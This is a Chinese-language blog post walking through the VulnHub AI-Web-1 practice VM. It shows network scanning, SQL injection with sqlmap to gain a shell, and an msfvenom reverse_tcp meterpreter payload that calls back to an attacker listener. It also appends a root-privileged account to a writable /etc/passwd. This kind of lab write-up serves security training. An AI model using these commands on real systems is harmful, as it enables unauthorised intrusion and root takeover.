freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

简单打靶场之AI_WEB_1
进击的HACK 2022-09-07 12:58:46 120214
所属地 上海

0x01 靶场搭建

从此链接下载,https://www.vulnhub.com/entry/ai-web-1,353/

解压打开靶场

1662526080_631822800dbfb9f70a9f3.png!small

0x02 靶场渗透

主机信息收集

确定主机ip

msf探测存活主机

use auxiliary/scanner/discovery/arp_sweep
info auxiliary/scanner/discovery/arp_sweep #显示出该模块的一些信息:基本选项、简介其作用
show options
set RHOSTS 192.168.91.0/24
set THREADS 30
run

1662526123_631822abce48550bc43e1.png!small?1662526126916

nmap探测靶机的端口

nmap -T4 -sC -sV -p- 192.168.91.132

1662526146_631822c24a5db028d4cb1.png!small

工具扫描

fscan

全面扫描

fscan32.exe -h 192.168.91.132

1662526180_631822e4dac87cc784d55.png!small

也没什么东西,只能手动测试了。

手工渗透

扫描路径 python dirsearch.py -u http://192.168.91.132/

扫到了robots.txt、

http://192.168.91.132/robots.txt

1662526222_6318230ef000c933411e9.png!small?1662526225541

发现两个目录,依次访问,但都显示403,

但是http://192.168.91.132/se3reTdir777/可以访问

1662526241_6318232151242b26ebba1.png!small?1662526243955

看到这个情况,尝试sql注入

可见此处存在sql注入,使用sqlmap进行利用

python sqlmap.py -r test.txt --batch --level 3

sqlmap上传webshell的前提要知道绝对路径

dirsearch扫描robots.txt中的另一个目录(靶机就是好,随便扫不会被封)

查看该链接,是phpinfo,绝对路径get

/home/www/html/web1x443290o2sdf92213/m3diNf0/info.php

因为某些目录存在403禁止访问,尝试路径

/home/www/html/web1x443290o2sdf92213/se3reTdir777/
/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/
/home/www/html/web1x443290o2sdf92213/m3diNf0/
/home/www/html/web1x443290o2sdf92213/

python sqlmap.py -r test.txt  --os-shell

这个就不要用--batch了

我们可以直接使用sqlmap上传的文件,它的原理是先写一个php文件上传的脚本,然后再上传一句话木马

从sqlmap提供的信息中可以知道文件名

我们也可以上传自己的木马或者后门

使用msf生成后门

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.91.139 LPORT=4444 -f elf > shell.elf

kali

msfconsole
use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.91.139
set LPORT 4444
run

web执行命令

cmd=chmod 777 shell.elf
cmd=./shell.elf

msf成功连接

提权

meterpreter > run post/multi/recon/local_exploit_suggester

尝试这几个exploit,但是都没有成功提权拿到session

收集内核与服务器版本信息

https://www.exploit-db.com/去搜索,但是没找到。

尝试其他提权方法

find suid提权

python -c 'import pty;pty.spawn("/bin/bash")'
find / -perm -u=s -type f 2>/dev/null

也没有找到能够利用的命令。

查看当前用户全局可写文件

find / -writable -type d 2>/dev/null #文件夹 
find / -writable -type f 2>/dev/null #文件

发现可写如/etc/passwd

添加一个用户到/etc/passwd 文件中

创建密码
perl -le 'print crypt("123.com","salt")'
echo "testsec:sarxjaiixejOU:0:0:hacker:/root:/bin/bash" >> /etc/passwd
cat /etc/passwd | grep testsec

0x03 总结

提权方法多种多样,一条不行选择其他的路。

# 渗透测试 # 网络安全 # web安全 # 网络安全技术 # 靶场实战
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 进击的HACK 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
简单打靶机
进击的HACK LV.6
欢迎关注公众号:进击的HACK 坚持每日更新,一起变得更强。
  • 36 文章数
  • 49 关注者
nuclei介绍与持续更新的poc集合
2023-04-24
钓鱼前邮件收集
2023-04-10
红队实战 | cobaltstrike钉钉群上线提醒
2023-04-06
文章目录